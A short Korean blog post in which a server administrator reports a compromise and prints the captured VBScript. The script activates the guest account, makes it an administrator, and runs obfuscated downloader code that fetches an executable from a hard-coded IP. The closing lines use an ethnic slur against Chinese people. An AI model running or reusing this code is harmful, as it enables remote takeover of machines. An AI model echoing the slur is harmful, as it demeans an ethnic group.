회사 서버에서 괴상 망측한 서비스가 3개 정도 돌아가길래.. 이래저래 중지 시키고 관련된
파일을 수거 하던 중..
악성 스크립트를 포착..
주요 경로는 임의의 웹 페이지에서 파일을 다운로드와 동시에 실행시켜
시스템 폴더로 서비스 dll 과 vb 스크립트를 설치
해당 서버를 원격 조정할 수 있게 만드는 것을 발견하였다.
스크립트 파일의 내용
dim wsh
set wsh=createobject("wscript.shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest 2539556633",0
wsh.run "net localgroup administrators guest /add",0
with wscript:if .arguments.count<2 then .quit:end if
set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp")
web.open "get",.arguments(0),0:web.send:if web.status>200 then quit
aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with
iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2
execute(chr(83)&chr(101)&chr(116)&chr(32)&chr(120)&chr(80)&chr(111)&chr(115)&chr(116)&chr(32)&chr(61)&chr(32)&chr(67)&chr(114)&chr(101)&chr(97)&chr(116)&chr(101)&chr(79)&chr(98)&chr(106)&chr(101)&chr(99)&chr(116)&chr(40)&chr(34)&chr(77)&chr(105)&chr(99)&chr(114)&chr(111)&chr(115)&chr(111)&chr(102)&chr(116)&chr(46)&chr(88)&chr(77)&chr(76)&chr(72)&chr(84)&chr(84)&chr(80)&chr(34)&chr(41)&chr(58)&chr(10)):xPost.Open "GET","http://219.148.147.207/1433.exe",0:xPost.Send():Set sGet = CreateObject("ADODB.Stream"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile "1433.exe",2
상위의 ip 를 조회해보니 중국 베이징... ㅡㅡ^
이 짱깨노무 쉐끼들 짱나!
백신으로도 안 걸리는 지독한 쉐끼들!
조심합시다~
THK 의 사소한 기록들